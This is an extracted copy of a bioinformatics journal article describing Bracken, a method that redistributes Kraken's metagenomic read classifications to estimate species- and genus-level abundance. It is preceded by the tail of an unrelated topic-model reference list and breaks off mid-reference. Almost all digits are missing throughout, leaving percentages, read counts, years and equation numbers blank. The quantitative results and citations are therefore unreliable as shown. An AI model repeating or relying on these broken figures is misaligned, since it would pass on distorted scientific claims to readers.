d. mimno, h.m. wallach, e. talley, m. leenders, and a. mccallum. . optimizing semantic coher- ence in topic models. in emnlp. v. nguyen, j. boyd-graber, and p. resnik. . lex- ical and hierarchical topic regression. in neural in- formation processing systems. m.j. paul and m. dredze. . factorial lda: sparse multi-dimensional text models. in neural informa- tion processing systems (nips). m.j. paul and m. dredze. . drug extraction from the web: summarizing drug experiences with multi- dimensional topic models. in naacl. m. paul and r. girju. a. a two-dimensional topic-aspect model for discovering multi-faceted topics. in aaai. m.j. paul and r. girju. b. summarizing con- trastive viewpoints in opinionated text. in empirical methods in natural language processing. m.j. paul, b.c. wallace, and m. dredze. . what affects patient (dis)satisfaction? analyzing online doctor ratings with a joint topic-sentiment model. in aaai workshop on expanding the boundaries of health informatics using ai. m. rabinovich and d. blei. . the inverse regres- sion topic model. in international conference on machine learning. d. ramage, d. hall, r. nallapati, and c.d. man- ning. . labeled lda: a supervised topic model for credit attribution in multi-labeled corpora. in emnlp. n.a. smith and j. eisner. . annealing structural bias in multilingual weighted grammar induction. in coling-acl. e.m. talley, d. newman, d. mimno, b.w. herr ii, h.m. wallach, g.a.p.c. burns, m. leenders, and a. mccallum. . database of nih grants us- ing machine-learned categories and graphical clus- tering. nature methods, ( ): – . n. ueda and r. nakano. . deterministic anneal- ing em algorithm. neural networks, ( ): – . b.c. wallace, m.j. paul, u. sarkar, t.a. trikalinos, and m. dredze. . a large-scale quantitative analysis of latent factors and sentiment in online doctor reviews. journal of the american medical informatics association, ( ): – . h.m. wallach, d. mimno, and a. mccallum. a. rethinking lda: why priors matter. in nips. h.m. wallach, i. murray, r. salakhutdinov, and d. mimno. b. evaluation methods for topic models. in icml. c. wang and d. blei. . decoupling sparsity and smoothness in the discrete hierarchical dirich- let process. in nips. m.d. zeiler. . adadelta: an adaptive learning rate method. corr, abs/ . . submitted july accepted november published january corresponding author jennifer lu, jlu @jhmi.edu academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright lu et al. distributed under creative commons cc-by . open access bracken: estimating species abundance in metagenomics data jennifer lu , , florian p. breitwieser , peter thielen and steven l. salzberg , , department of biomedical engineering, johns hopkins university, baltimore, md, united states center for computational biology, mckusick-nathans institute of genetic medicine, johns hopkins school of medicine, baltimore, md, united states applied physics laboratory, johns hopkins university, laurel, md, united states departments of computer science and biostatistics, johns hopkins university, baltimore, md, united states abstract metagenomic experiments attempt to characterize microbial communities using high-throughput dna sequencing. identification of the microorganisms in a sample provides information about the genetic profile, population structure, and role of microorganisms within an environment. until recently, most metagenomics studies focused on high-level characterization at the level of phyla, or alternatively sequenced the s ribosomal rna gene that is present in bacterial species. as the cost of sequencing has fallen, though, metagenomics experiments have increasingly used unbiased shotgun sequencing to capture all the organisms in a sample. this approach requires a method for estimating abundance directly from the raw read data. here we describe a fast, accurate new method that computes the abundance at the species level using the reads collected in a metagenomics experiment. bracken (bayesian reestimation of abundance after classification with kraken) uses the taxonomic assignments made by kraken, a very fast read-level classifier, along with information about the genomes themselves to estimate abundance at the species level, the genus level, or above. we demonstrate that bracken can produce accurate species- and genus-level abundance estimates even when a sample contains multiple near-identical species. subjects bioinformatics, computational biology keywords metagenomics, species abundance, microbiome, bayesian estimation introduction metagenomics is a rapidly growing field of study, driven in part by our ability to generate enormous amounts of dna sequence rapidly and inexpensively. since the human genome was first published in (the international human genome sequencing consortium, ; venter et al., ), sequencing technology has become approximately one million times faster and cheaper, making it possible for individual labs to generate as much sequence data as the entire human genome project in just a few days. in the context of metagenomics experiments, this makes it possible to sample a complex mixture of microbes by ‘‘shotgun’’ sequencing, which involves simply isolating dna, preparing the dna for sequencing, and sequencing the mixture as deeply as possible. shotgun sequencing is relatively unbiased compared to targeted sequencing methods (venter et al., ), including widely-used s ribosomal rna sequencing, and it has the additional advantage that it captures any species how to cite this article lu et al. ( ), bracken: estimating species abundance in metagenomics data. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jlu @jhmi.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. with a dna-based genome, including eukaryotes that lack a s rrna gene. because it is unbiased, shotgun sequencing can also be used to estimate the abundance of each taxon (species, genus, phylum, etc.) in the original sample, by counting the number of reads belonging to each taxon. along with the technological advances, the number of finished and draft genomes has also grown exponentially over the past decade. at present there are thousands of complete bacterial genomes, , draft bacterial genomes, and , full or partial virus genomes in the public genbank archive (benson et al., ). this rich resource of sequenced genomes now makes it possible to sequence uncultured, unprocessed microbial dna from almost any environment, ranging from soil to the deep ocean to the human body, and use computational sequence comparisons to identify many of the formerly hidden species in these environments (riesenfeld, schloss & handelsman, ). several accurate methods have appeared that can align a sequence ‘‘read’’ to a database of microbial genomes rapidly and accurately (see below), but this step alone is not sufficient to estimate how much of a species is present. complications arise when closely related species are present in the same sample–a situation that arises quite frequently–because many reads align equally well to more than one species. this requires a separate abundance estimation algorithm to resolve. in this paper, we describe a new method, bracken, that goes beyond simply classifying individual reads and computes the abundance of species, genera, or other taxonomic categories from the dna sequences collected in a metagenomics experiment. when it was first published in , the kraken metagenomics classifier represented a major enhancement in the speed with which large metagenomics sequence data could be processed (wood & salzberg, ), running over times faster than megablast (morgulis et al., ), the closest competitor at the time. kraken’s success and accuracy rely on its use of a very large, efficient index of short sequences of length k, which it builds into a specialized database. if k is chosen appropriately, then most sequences of length k in the database will be unique to a single species, and many will also be unique to a particular strain or genome. larger values of k will yield a database in which even more of each genome is uniquely covered by k-mers; obviously, though, k should not be longer than the length of a sequencing read, and metagenomics projects currently generate reads as short as – base pairs (bp). longer k-mers are also more likely to contain errors, meaning that more reads will be left unclassified if k is too long. smaller k-mers, in contrast, will yield higher sensitivity because the minimum match length is shorter. when used to identify the taxonomic label of metagenomics sequences, the kraken system for classification of metagenomics sequences is extremely fast and accurate (wood & salzberg, ). when classifying raw sequence reads, though, many reads correspond to identical regions between two or more genomes. (the number of such ambiguous reads decreases as reads get longer.) kraken solves this problem by labeling the sequence with the lowest common ancestor (lca) of all species that share that sequence, as discussed further below. lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ambiguity among microbial species and strains as the database of bacterial genomes has grown, an increasing number of genomes share large portions of their sequence with other genomes. in many cases, these genomes are nearly identical; indeed, sequencing has revealed to scientists that many formerly distinct species and genera are far closer than were known prior to sequencing. many species have been renamed as a result, in a process that is continual and ongoing, but many other species have retained their old names, often for historical or other reasons. for example, the species mycobacterium bovis is over . % identical to mycobacterium tuberculosis (garnier et al., ), and many cases of human tuberculosis are caused by m. bovis (which also infects cows) rather than m. tuberculosis (grange, ). their high sequence identity indicates that they should be considered as two strains of a single species, but they retain different species names. as a compromise, taxonomists have created the category mycobacterium tuberculosis complex (brosch et al., ) to represent a collection of taxa that now includes more than strains of five different species. this category sits above the species level but below the genus level in the current microbial taxonomy, but it can best be described as a species. other examples are numerous and still growing. the three species bacillus anthracis (the causative agent of anthrax), bacillus cereus, and bacillus thuringiensis are well over % identical and should all be designated as a single species (helgason et al., ), although their names have not been changed despite their near-identity revealed by sequencing. as a compromise, taxonomists created the category bacillus cereus group, between the level of species and genus, to include these three species and at least five others (liu et al., ), all of which are extremely similar to one another. in some cases, two organisms that should be called the same species may even have different genus names. for example, escherichia coli and shigella flexneri are classified in different genera, but we know from sequence analysis that they represent the same species (lan & reeves, ). failure to recognize the mutability of the bacterial taxonomy can lead to erroneous conclusions about the performance of metagenomic classifiers. for example, one recent study (peabody et al., ) created a mock community of species, one of which was anabaena variabilis atcc , not realizing that this genome had been renamed and was synonymous with species in the genus nostoc (thiel et al., ). when anabaena was removed from the database, kraken correctly identified the reads as nostoc, but peabody et al. erroneously considered all these reads to be misclassified. classification versus abundance estimation kraken attempts to assign a taxonomy label to every read in a metagenomics sample using a custom-built database that may contain any species the user chooses. among the current set of finished bacterial and archaeal genomes, hundreds of species can be found for which large fractions of their sequence are identical to other genomes belonging to distinct strains, species, or even genera. the reads arising from common regions in these species result in a tie when analyzed with kraken’s classification algorithm, so kraken correctly reports only the lowest common ancestor (lca) (wood & salzberg, ). it follows that for well-populated clades with low genome diversity, kraken only reports species-level lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. assignments for reads from unique regions, and a true indication of total abundance can only be made by taking both species and genus (or higher) level assignments into account. this implies that for some species, the majority of reads might be classified at a higher level of the taxonomy. kraken thus leaves many reads ‘‘stranded’’ above the species level, meaning that the number of reads classified directly to a species may be far lower than the actual number present. therefore, any assumption that kraken’s raw read assignments can be directly translated into species- or strain-level abundance estimates (e.g., schaeffer et al., ) is flawed, as ignoring reads at higher levels of the taxonomy will grossly underestimate some species, and creates the erroneous impression that kraken’s assignments themselves were incorrect. nonetheless, metagenomics analysis often involves estimating the abundance of the species in a particular sample. although we cannot unambiguously assign each read to a species, we would like to estimate how much of each species is present, specifically by estimating the number or percentage of reads in the sample. several software tools have been developed to estimate species abundances in metagenomics samples [metaphlan, constrains, gaas, gasic, taec, grammy] (angly et al., ; lindner & renard, ; luo et al., ; segata et al., ; sohn et al., ; xia et al., ). these tools, however, employ different strategies for read-level classification which are not always as accurate and efficient as kraken’s k-mer approach (lindgreen, adair & gardner, ). rather than re-engineer kraken to address the ambiguous read classification issue and to provide abundance estimates directly, we decided to implement the new species-level abundance estimation method described here as a separate program. this preserves both backwards compatibility for existing kraken users, and offers the ability to generate more accurate species abundance estimates for datasets already processed by kraken. note that if kraken fails to identify a species (e.g., if the species was missing from the kraken database), bracken too will not identify that species. materials and methods our new method, bracken (bayesian reestimation of abundance after classification with kraken), estimates species abundances in metagenomics samples by probabilistically re-distributing reads in the taxonomic tree. reads assigned to nodes above the species level are distributed down to the species nodes, while reads assigned at the strain level are re-distributed upward to their parent species. for example, in fig. we would distribute reads assigned to the mycobacteriaceae family and the mycobacterium genus down to m. marinum and m. avium, and reads assigned to each m. marinum strain would be reassigned to the m. marinum species. as we show below, bracken can easily reestimate abundances at other taxonomic levels (e.g., genus or phylum) using the same algorithm. in order to re-assign reads classified at higher-level nodes in the taxonomy, we need to compute a probabilistic estimate of the number of reads that should be distributed to the species below that node. to illustrate using the nodes in fig. , we need to allocate all reads assigned to mycobacterium (g ) to m. marinum (s ) and m. avium (s ) below lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic showing a partial taxonomic tree for the mycobacteriaceae family. it, and reads assigned to the mycobacteriaceae would have to be allocated to m. marinum (s ), m. avium (s ), andhoyosella altamirensis (s ). reallocating reads from a genus-level node in the taxonomy to each genome below it can be accomplished using bayes’ theorem, if the appropriate probabilities can be computed. let p(si) be the probability that a read in the sample belongs to genome si, p(gj) be the probability that a read is classified by kraken at the genus level gj, and p(gj|si) be the probability that a read from genome si is classified by kraken as the parent genus gj. then the probability that a read classified at genus gj belongs to the genome si can be expressed as eq. ( ): p(si|gj)= p(gj|si)p(si) p(gj) . ( ) note that because we began by assuming that a read was classified at node gj, p(gj)= . next we consider how to compute p(gj|si), the probability that a read from genome si will be classified by kraken at the parent genus gj. we estimate this probability for reads of length r by classifying the sequences (genomes) that we used to build the database using that same database, as follows. for each k-mer in the sequences, kraken assigns it a taxonomy id by a fast lookup in its database. to assign a taxonomy id for a read of length r, kraken examines all k-mer classifications in that read. for example, for k = and r = , the read will contain k-mers. our procedure examines, for each genome in the database, a sliding window of length r across the entire genome. to find the taxonomy id kraken would assign to each window, we simply find the deepest taxonomy node in the set of k-mers in that window. since each k-mer in a database lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. sequence is assigned to a taxonomy id somewhere along the path from the genome’s taxonomy id to the root, the highest-weighted root-to-leaf path (and thus the kraken classification) corresponds to the deepest node. for each genome si of length li we thus generate (li−r+ ) mappings to taxonomical ids. for node gj, we then count the number of reads from si that are assigned to it, ngj(si). p(gj|si) is then the proportion of reads from si that were assigned to the genus node gj; i.e., p(gj|si)=ngj(si)/(li−r+ ). we also calculate the proportion of reads from si that were assigned to every node from genome si to the root node of the taxonomy tree. the final term that we must calculate from eq. ( ) is p(si), the probability that a read in the sample belongs to genome si, which is computed in relation to other genomes from the same genus. for example, if the sample contains three genomes in the same genus, and if % of all reads from those three genomes belong to si, then p(si)= . . we estimate this probability using the reads that are uniquely assigned by kraken to genome si, as follows. if we let usi be the proportion of genome si that is unique, then usi = nsi li−r+ ( ) where nsi is the number of k-mers of length r that are uniquely assigned to genome si by kraken, and li is the genome length. for example, if li= mbp and only , k-mers are unique to genome si, then usi= . . then, using the number of reads ksi from a sample that kraken actually assigns to si, we can estimate the number of reads that likely derive from si as: k̂si = k si u si . ( ) for example, if kraken classifies , reads as genome si and % of the reads from si are unique, then we would estimate that , reads ( , / . ) from si are contained in the sample. if genus gj contains n genomes, we estimate the number of reads k̂s for each of the n genomes and then calculate p(si) by: p (si)= k̂si∑n a= k̂sa . ( ) using this result in eq. ( ) above allows us to compute p(si|gj) for each genome si. each probability p(si|gj) is then used to estimate the proportion of the reads assigned to genus gj that belong to each of the genomes below it. these calculations are repeated for each taxonomic level above the genus level (family, class, etc.), with read distribution at each level going to all genomes classified within that taxonomic subtree. to compute species abundance, any genome-level (strain-level) reads are simply added together at the species level. in cases where only one genome from a given species is detected by kraken in the dataset, we simply add the reads distributed downward from the genus level (and above) to the reads already assigned by kraken to the species level. in cases lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where multiple genomes exist for a given species, the reads distributed to each genome are combined and added to the kraken-assigned species level reads. the added reads give the final species-level abundance estimates. this method can also estimate abundance for other taxonomic levels. in such cases, only higher nodes within the taxonomy tree undergo read distribution. after distributing reads downward, we estimate abundance for a node at the level specified by combining the distributed reads across all genomes within that node’s subtree. software and data availability bracken is written in perl and python and is freely available for download at http: //ccb.jhu.edu/software/bracken/. the reads from the skin microbiome experiment are freely available from ncbi under bioproject prjna . results and discussion we applied the statistical re-assignment method described here to create species-level abundance estimates for several metagenomics data sets. the overall procedure works as follows. first, we compute a set of probabilities from the kraken database by computing, for every sequence of length r in every genome, where it will be assigned in the taxonomy (see ‘methods’). for our experiments, we set r= as our datasets contain -bp reads. bracken can use these probabilities for any metagenomics data set, including data with different read lengths, although the estimates might be slightly improved by re-computing with a read length that matches the experimental data. second, we run kraken on the dataset to produce read-level taxonomic classifications. we then apply our abundance estimator, bracken, which uses the numbers of reads assigned by kraken at every level of the taxonomy to estimate the abundances at a single level (e.g., species). note that to exclude false positives, bracken ignores species with counts below a user-adjustable threshold. in our experiments, we selected a threshold of reads. experiments on a -genome metagenomics data set for our first experiments, we used a data set containing simulated illumina reads from genomes. this data, which we call here the i dataset, was used previously in a comparison of metagenomic assembly algorithms (mende et al., ). the data contains . million paired reads ( . m pairs) from genomes representing species. the reads have error profiles based on quality values found in real illumina reads (mende et al., ). the i dataset includes several very challenging genomes for this task, including multiple strains and species in the genera bacillus and mycobacteria, some of which are nearly identical to one another. the i data are freely available at http://www.bork.embl.de/~mende/simulated_data. the difficulty of estimating species abundance increases as the database itself contains more species. for example, it would clearly be easier to estimate abundances in the i dataset if we used a kraken database containing only the genomes in that dataset. to make the problem more realistic, we built two different databases and estimated abundance using both. the first (‘‘small’’) database contains genomes including the i genomes; lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ccb.jhu.edu/software/bracken/ http://ccb.jhu.edu/software/bracken/ http://www.ncbi.nlm.nih.gov/bioproject/?term=prjna http://www.bork.embl.de/~mende/simulated_data http://dx.doi.org/ . /peerj-cs. figure estimates of species abundance in the i metagenomics dataset computed by kraken (blue) and bracken (blue + orange). for this result, the kraken database contained genomes that included the i genomes. the smaller graph displays results for the subset of species for which bracken made the largest adjustments. the black line shows the true number of reads from each species. precise numbers for the kraken clas- sification, true read counts, and bracken estimates are contained in table s a. this is the full database from the simulation study by mende et al. ( ). the results when using the small database for classification are shown in fig. . for several species, the initial kraken numbers (reads assigned to a particular species) are far too low, because many of the reads (for some genomes, a large majority) were assigned labels at the genus level or above. after reestimation with bracken, these reads were redistributed to the species level, with the result that almost all the abundance estimates were – % correct, as shown in the figure. the second (‘‘large’’) database contains all genomes used in the synthetic and spike-in experiments, as well as a broad background of bacterial genomes. in particular, it includes all complete bacterial and archaeal genomes from refseq as of july (archived at ftp://ftp.ncbi.nlm.nih.gov/genomes/archive/old_refseq), which total distinct taxa, plus those i genomes that were not present in the refseq data. (we excluded draft genomes because they often contain vector sequences or other contaminants.) we also added the nine genomes used in our skin bacteria spike-in experiment (described below) resulting in a total of distinct taxa. the complete list of sequences in the large database can be found in table s . the resulting kraken database has a size of gb. lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- ftp://ftp.ncbi.nlm.nih.gov/genomes/archive/old_refseq http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure estimates of species abundance computed by kraken (blue) and bracken (blue + orange) for the i metagenomics data. for this re- sult, the kraken database contained , distinct bacterial and archaeal taxa. the black line shows the true number of reads from each species. the smaller graph displays results for the subset of species for which bracken made the largest adjustments. precise numbers for the kraken classifica- tion, true read counts, and bracken estimates are contained in table s b. figure shows results when using the large database to estimate abundance for the i genomes. this test is much more difficult because of the large number of similar and near-identical genomes in the database. many more reads are ambiguous, mapping identically to two or more species, which means that kraken assigns them to the lca of those species. nonetheless, bracken brings the estimated abundance of all species within % of the true abundance, and most fall within %. note that when the re-estimation procedure distributes reads from higher nodes in the taxonomy down to multiple species within a single genus, it may over-estimate one species and underestimate its sister species if the re-allocation is imperfect. tables s a–s b contains the detailed numbers for all species in figs. and , along with an error rate for each species in the i data, expressed as the difference between the true and estimated proportions. we calculated the average error as: n n∑ i= ∣∣∣r(i)true−r(i)est∣∣∣ r(i)true ( ) lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure number of reads within the mycobacterium genus as assigned by kraken (blue), estimated by bracken (purple) and compared to the true read counts (green). initially, kraken assigned only , reads to mycobacterium sp. jls although , reads originated from this species. bracken reassigned , reads from the mycobacterium genus to m. sp. jls. bracken’s re-estimated abundance for m. sp. jls is much closer to the true read count. table s contains precise numbers for all species shown here. where n is the number of species in the i data, r(i)true is the true number of reads for species i, and r(i)est is the bracken estimate of the number of reads for species i. when using the small database, the average relative error of bracken is . % across all species in the i data. for the larger database, the average relative error is . %. we also calculated false positive rates for the i data as the percentage of total reads incorrectly classified after bracken abundance estimation. for the small database, the false positive rate is . % and for the large database, the false positive rate is . %. within the i genomes, the five species belonging to the mycobacterium genus (m. tuberculosis, m. bovis, m. avium, m. marinum, and m. sp. jls) pose a particular challenge for abundance estimation due to the similarities among their individual genomes. for example, kraken classified only , m. tuberculosis reads at the species level, and classified the remaining , reads as either mycobacterium (a genus) or m. tuberculosis complex (a taxonomic class intermediate between genus and species), as shown in fig. and table s . for these mycobacteria genomes, bracken reallocated the reads from higher-level nodes to yield species abundance estimates within % of the true abundance. figure and table s show the number of reads assigned to each species by kraken, the true number of reads, and the number of reads assigned to each species by bracken after abundance reestimation. the five species of the mycobacterium genus also provide an example of potential overestimation by bracken. bracken apportions all ambiguous reads classified by kraken at the genus level (and above) to the existing species identified by kraken. because bracken uses a probabilistic method in distributing the reads, one species may receive too many reads while another may receive too few. for example, kraken assigned , reads to m. tuberculosis complex. bracken re-allocated , of these reads to m. tuberculosis and the remaining , reads to m. bovis. when added to kraken’s original assignments, bracken estimated that , reads belonged to m. tuberculosis ( , reads more than the true number) that , reads belonged to m. bovis ( , reads less than the true number). it is likely that some of the additional reads bracken allocated to m. tuberculosis originated from m. bovis instead. however, despite the over- and under-estimation, bracken’s estimates fell within % of the true number of reads for both species. if m. bovis were excluded from the database, the , reads unique to m. bovis, as identified by kraken, would be unclassified, while all , reads assigned to the lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. m. tuberculosis complex would assigned to m. tuberculosis by kraken. these reads would no longer be ambiguous because no other mycobacterium species from the m. tuberculosis complex would be present in the database. in general, reads belonging to species excluded from the database will either be assigned to species with very high similarity to the missing species or will remain unclassified. experiments on a real metagenomics sample created from known species for a more realistic evaluation of the performance of bracken, we generated new sequence data using a set of bacteria that are commonly found on healthy human skin. this mock community was assembled by combining purified dna from nine isolates that were identified and sequenced during the initial phase of the human microbiome project (human microbiome project, ): acinetobacter radioresistens strain sk , corynebacterium amycolatum strain sk , micrococcus luteus strain sk , rhodococcus erythropolis strain sk , staphylococcus capitis strain sk , staphylococcus epidermidis strain sk , staphylococcus hominis strain sk , staphylococcus warneri strain sk , and propionibacterium acnes strain sk . to generate the skin microbiome community, purified dna was obtained from the biodefense and emerging infections research resources repository (bei resources). each of the nine bacterial isolates was grown under conditions recommended by bei resources, collected by centrifugation during log growth phase at a nm optical density (od ) of . – . , and genomic dna was isolated using masterpure dna isolation reagents (epicentre). purified genomic dna was quantified using the high sensitivity picogreen assay (invitrogen), pooled in equal amounts by mass, and prepared for sequencing using nextera xt library preparation reagents (illumina). the sample was then sequenced on a hiseq sequencer, generating a total of , , million read pairs ( million reads), all of them bp in length. these were then classified as pairs by kraken, which concatenates the two reads from each pair and assigns them to a single taxonomic category. we used bracken to estimate both species and genus-level abundance in the skin microbiome community. in the bracken results, the nine true species comprise over % of the species-level abundance estimates. the mixture was created with approximately equal amounts of each of the nine genomes, so the expectation was that each species would account for∼ % of the total. however, as shown in fig. , the estimates varied from . % to . %. details for the exact number of reads assigned by kraken and the abundance estimates by bracken are shown in table s . deviations from the expected abundance could arise from a variety of factors. the process of quantifying dna and mixing in equal amounts can be influenced by pipetting consistency. second, library amplification by pcr, an integral step in the nextera library preparation process, can exaggerate small differences in quantities and lead to significant biases in abundance (bowers et al., ). we examined a sample of the classified reads by hand, and could find no evidence that kraken mis-classified reads from m. luteus (the smallest portion of the community, estimated at . %) to any of the other species or lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure estimates of species abundance made by bracken for the metagenomics community contain- ing isolates of nine bacterial species commonly found on human skin. precise numbers can be found in table s . genera. the abundances found in this data, therefore, may correspond fairly closely with the true abundances. the genus-level abundance estimates computed by bracken also correspond closely to the expected abundances for the six genera included in the sample. four of the nine species belong to the genus staphylococcus, which was thus expected to comprise % ( × %) of the sample. the bracken estimate was . %. each of the other genus classifications has only one species present, and their abundance estimates are the same for both genus and species. the comparison between the kraken classification of reads and bracken’s reassignment revealed that the nine species are sufficiently distinct to allow kraken to classify a large majority of reads at the species level, with very few reads being classified at higher levels of the taxonomy. specifically, kraken classified . million reads to the nine species included in the sample. only . million reads out of the . million total ( . %) were classified by kraken at the genus level or above. (the remaining reads were unclassified.) in this case bracken does not provide a substantial benefit, because reassignment of the . million reads could yield at most a . % change in the estimated composition of the sample. abundance estimation timing and resource requirements in the i data experiment with the small database, we used gigabytes (gb) of ram with threads to build the kraken database and generate the k-mer distribution file required by bracken. in total, these steps completed in about h and yielded files that can be used across multiple datasets. the resulting kraken database and distribution files use gb of space. kraken classification of the i dataset took min, using threads and gb of ram. this step is limited by the size of the database, which is loaded into ram during classification. bracken alone runs in under a second, using mb of ram. the kraken classification file for the i data is . gb, while bracken abundance estimation lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. files require∼ kb of space. table s lists detailed timing, ram, and space requirements for each file and step of the bracken abundance estimation algorithm. conclusion estimating the abundance of species, genera, phyla, or other taxonomic groups is a central step in the analysis of many metagenomics datasets. metagenomics classifiers like kraken provide a very fast and accurate way to label individual reads, and at higher taxonomic levels such as phyla, these assignments can be directly translated to abundance estimates. however, many reads cannot be unambiguously assigned to a single strain or species, for at least two reasons. first, many bacterial species are nearly identical, meaning that a read can match identically to two or more distinct species. second, the bacterial taxonomy itself is undergoing constant revisions and updates, as genome sequencing reveals the need to re-assign species to new names. these revisions sometimes create new taxa that share near-identical sequence with a distinct species. in these situations, kraken correctly assigns the read to a higher-level taxonomic category such as genus or family. this creates a problem in that kraken’s classifications cannot be used directly for species abundance estimation. bracken addresses this problem by probabilistically re-assigning reads from intermediate taxonomic nodes to the species level or above. as we have shown here, these re-assignments produce species-level abundance estimates that are very accurate, typically % correct or higher. for genus-level abundance, accuracy is even higher because fewer reads have ambiguous assignments at that level. for abundance estimation at higher levels, ranging from family up to phylum, kraken’s original read assignments can be used directly to create abundance estimates. acknowledgements we would like to thank derrick wood for valuable suggestions on the implementation of the algorithm, and kasper hansen for helpful comments and feedback on a draft version of this manuscript. additional information and declarations funding this work was supported in part by the us national institutes of health r -hg and r -gm and by the us army research office w nf- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: us national institutes of health: r -hg , r -gm . us army research office: w nf- . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. competing interests steven l. salzberg is currently serving as an academic editor for peerj. author contributions • jennifer lu and florian p. breitwieser conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • peter thielen performed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. • steven l. salzberg conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: bracken is written in perl and python and is freely available for download at http://ccb.jhu.edu/software/bracken/. the reads from the skin microbiome experiment are freely available from ncbi under bioproject prjna . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references angly fe, willner d, prieto-davo a, edwards ra, schmieder r, vega-thurber r, antonopoulos da, barott k, cottrell mt, desnues c, dinsdale ea, furlan m, haynes m, henn mr, hu y, kirchman dl, mcdole t, mcpherson jd, meyer f, miller rm, mundt e, naviaux r, rodriguez b, stevens rk, wegley l, zhang l, zhu b, rohwer f. . the gaas metagenomic tool and its estimations of viral and microbial average genome size in four major biomes. plos computational biology :e doi . /journal.pcbi. . benson da, clark k, karsch-mizrachi i, lipman dj, ostell j, sayers ew. . genbank. nucleic acids research :d –d doi . /nar/gku . bowers rm, clum a, tice h, lim j, singh k, ciobanu d, ngan cy, cheng jf, tringe sg, woyke t. . impact of library preparation protocols and template quantity on the metagenomic reconstruction of a mock microbial community. bmc ge- nomics : doi . /s - - - . brosch r, gordon sv, marmiesse m, brodin p, buchrieser c, eiglmeier k, garnier t, gutierrez c, hewinson g, kremer k, parsons lm, pym as, samper s, van soolingen d, cole st. . a new evolutionary scenario for the mycobacterium tuberculosis complex. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . lu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://ccb.jhu.edu/software/bracken/ http://www.ncbi.nlm.nih.gov/bioproject/?term=prjna http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. garnier t, eiglmeier k, camus jc, medina n, mansoor h, pryor m, duthoy s, grondin s, lacroix c, monsempe c, simon s, harris b, atkin r, doggett j, mayes r, keating l, wheeler pr, parkhill j, barrell bg, cole st, gordon sv, hewinson rg. . the complete genome sequence of mycobacterium bovis. proceedings of the national academy of sciences of the united states of america : – doi . /pnas. . grange jm. . mycobacterium bovis infection in human beings. tuberculosis : – doi . /tube. . . helgason e, okstad oa, caugant da, johansen ha, fouet a, mock m, hegna i, kolsto ab. . bacillus anthracis, bacillus cereus, and bacillus thuringiensis–one species on the basis of genetic evidence. applied and environmental microbiology : – doi . /aem. . . - . . human microbiome project c. . structure, function and diversity of the healthy human microbiome. nature : – doi . /nature . lan r, reeves pr. . escherichia coli in disguise: molecular origins of shigella. microbes and infection : – doi . /s - ( ) - . lindgreen s, adair kl, gardner pp. . an evaluation of the accuracy and speed of metagenome analysis tools. scientific reports :article doi . /srep . lindner ms, renard by. . metagenomic abundance estimation and diagnostic testing on species level. nucleic acids research :e doi . /nar/gks . liu y, lai q, göker m, meier-kolthoff jp, wang m, sun y, wang l, shao z. . genomic insights into the taxonomic status of the bacillus cereus group. scientific reports :article doi . /srep . luo c, knight r, siljander h, knip m, xavier rj, gevers d. . constrains identifies microbial strains in metagenomic datasets. nature biotechnology : – doi . /nbt. . mende dr, waller as, sunagawa s, jarvelin ai, chan mm, arumugam m, raes j, bork p. . assessment of metagenomic assembly using simulated next generation sequencing data. plos one :e doi . /journal.pone. . morgulis a, coulouris g, raytselis y, madden tl, agarwala r, schaffer aa. . database indexing for production megablast searches. bioinformatics : – doi . /bioinformatics/btn . peabody ma, van rossum t, lo r, brinkman fs. . evaluation of shotgun metagenomics sequence classification methods using in silico and in vitro simulated communities. bmc bioinformatics : doi . /s - - - . riesenfeld cs, schloss pd, handelsman j. . metagenomics: genomic analysis of microbial communities. annual 